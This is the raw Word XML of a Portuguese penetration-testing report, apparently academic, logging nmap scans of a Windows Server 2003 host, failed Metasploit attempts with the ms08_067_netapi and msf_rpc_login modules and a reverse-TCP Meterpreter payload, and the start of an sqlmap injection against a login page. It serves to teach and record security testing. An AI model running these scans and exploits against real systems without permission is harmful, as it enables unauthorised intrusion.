            <wp:extent cx="5019675" cy="3475355"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21430"/>
                <wp:lineTo x="21559" y="21430"/>
                <wp:lineTo x="21559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7 - Rota traçada pelo Tracerouter - Parte 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00BF5785" w:rsidP="00F3154F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1415" w:firstLine="1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Serviços e</w:t>
      </w:r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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r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>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; 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Microsoft Windows microsoft-ds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</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma distribuição Windows;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Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82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Microsoft Windows 98 netbios-ssn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185ED4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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BF5785" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00530877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Microsoft Firmware Ppt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C624E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1248B1EF" wp14:editId="09DEDFB1">
            <wp:extent cx="5400040" cy="37585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8 - Rota traçada pelo Tracerouter - Parte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B700D" w:rsidRDefault="006B700D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700D" w:rsidRDefault="006B700D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Varredura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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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Utilização do comando nmap -sV -p 1-65535 -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00831A3E" w:rsidRPr="00F15F82" w:rsidRDefault="00831A3E" w:rsidP="006B700D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nmap” executa a ferramenta Nmap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B700D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“-sV” permite que a ferramenta realize o SYN</w:t>
      </w:r>
      <w:r w:rsidR="003D23F9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e busque a versão do software </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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“-p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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</w:t>
      </w:r>
      <w:r w:rsidR="00B3361B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema operacional 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B700D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IP_do_servidor é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178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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3178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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explorado, as portas abertas e a versão dos serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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</w:p>
    <w:p w:rsidR="005F79D1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3178EE" w:rsidRDefault="003178EE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De acordo com a figura 9,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 abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F79D1" w:rsidRPr="00F15F82" w:rsidRDefault="005F79D1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46382FD0" wp14:editId="748F2656">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5676900" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21475"/>
                <wp:lineTo x="21528" y="21475"/>
                <wp:lineTo x="21528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D2B" w:rsidRPr="00F15F82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9 - Versão do software rodando nas portas escaneadas</w:t>
      </w:r>
      <w:r w:rsidR="003178EE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</w:p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</w:t>
      </w:r>
      <w:r w:rsidR="00AA00BE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3178EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; 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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds</w:t>
      </w:r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2B1EF3" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows 98 netbios-ssn</w:t>
      </w:r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2B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82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2B1EF3" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00AA00BE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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="00530877"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30877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877" w:rsidP="00F3154F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1418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A83EB9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7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando nmap -sU -p 1-65535 IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D">
      <w:p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</w:p>
    <w:p w:rsidR="00AF248B" w:rsidRPr="00F15F82" w:rsidRDefault="00AF248B" w:rsidP="006B700D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nmap” executa a ferramenta Nmap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B700D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“-sU” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00184BA7" w:rsidRPr="006B700D" w:rsidRDefault="00184BA7" w:rsidP="006B700D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6B700D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B700D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>-p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo 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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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IP_do_servidor é o IP onde está hospedada a aplicação em teste.</w:t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C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F2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Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas UDP abertas e a versão e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25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</w:p>
    <w:p w:rsidR="00240857" w:rsidRDefault="005967D5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9C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="00184BA7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De acordo com a figura 10</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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, </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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>Também foi possível descobrir</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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as portas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UDP</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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 abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82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 wp14:anchorId="32BEA109" wp14:editId="5634B068">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-52070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5705475" cy="4083685"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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F15F82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10 - Versão do software rodando nas portas UDP escaneadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00477883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Serviços encontrados na figura 10</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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netbios-ns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NetBios [4]; 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netbios -dgm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- serviço de datagrams do NetBios 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snmp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microsoft-ds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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31" w:rsidP="0063043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L2TP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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Protocolo de Encapsulamento de Camada 2)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[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00967B9F" w:rsidRPr="00F15F82" w:rsidRDefault="00477883" w:rsidP="0047788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552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r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRDefault="00477883" w:rsidP="0047788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2552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r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando </w:t>
      </w:r>
      <w:r w:rsidR="00967B9F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00240857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1843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F15F82" w:rsidRDefault="00A6607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902307" w:rsidRDefault="00902307" w:rsidP="00902307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4.3.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque à porta RPC - via </w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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10/04/16.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Ataque à porta RPC descoberta na análise de servidor via Nmap realizada anteriormente.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Tentar se conectar à porta 135 usando o framework Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ferramenta abordada no subcapítulo 3.2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para tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00902307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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00902307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Tentar configurar algum exploit </w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para atacar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a porta 135.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902307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A ferramenta </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é de difícil configuração e possui</w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma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902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bibliografia</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> muito ruim para iniciantes.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Não foi possível obter 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>nenhum resultado.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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0090230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exploit escolhido para testar o caso específico da porta RPC foi o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auxiliary/scanner/msf/msf_rpc_login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. O payload a ser executado é o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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. 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F15F82" w:rsidRDefault="00FE6FEB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1A5B8E" w:rsidP="003243CE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exploit não consiga ser executado.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Default="005967D5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Default="008C6DC7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exploit foi enviado</w:t>
      </w:r>
      <w:r w:rsidR="003243CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, mas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não trouxe resultado. Após verificação, foi constatado que o exploit é voltado pra Windows NT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243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F15F82" w:rsidRDefault="008C6DC7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Tentar atacar a porta 445 usando exploits automatizados.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Para esse caso, o exploit escolhido foi o MS08-67 disponível no caminho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/windows/smb/ms08_067_netapi.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Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft ds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. O payload é o utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S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2: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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. 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F15F82" w:rsidRDefault="00FE6FEB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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE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exploit não consiga ser executado.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Default="005967D5" w:rsidP="003243CE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3243CE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O exploit não foi executado na máquina do servidor.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Default="003243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51591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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243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Tentar atacar a porta 135.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="707"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exploit escolhido foi o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auxiliary/scanner/msf/msf_rpc_login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 para testar o caso específico da porta RPC escolhida. O payload a ser executado é o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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB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máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FE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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB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1A5B8E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exploit não consiga ser executado.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Default="005967D5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Default="00D76012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 xml:space="preserve"> O exploit não foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE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3243CE" w:rsidP="003243CE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4.3.2.3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Tela de Login – Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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no dia 11/04.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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2 horas e 30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Utilizar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abordada no subcapítulo 3.2,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para automatizar o processo de detecção de vulnerabilidades na tela de Login </w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizando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injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243C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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRDefault="008C6DC7" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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Verificar se a tela de Login é vulnerável a injeção de código SQL. Caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00F15F82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3243CE" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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3243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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ab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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Para realizar essa Sessão de teste foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho de requisição HTTP no momento em que a página do Login é acessada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A" w:rsidP="003243CE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4AD8EBF" wp14:editId="714A14EB">
            <wp:extent cx="3971925" cy="12763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1(Editada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E" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE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11- Parâmetros obtidos através do Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="16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D20770" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="709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Comando utilizado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B01036" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B01036">
          <w:rPr>
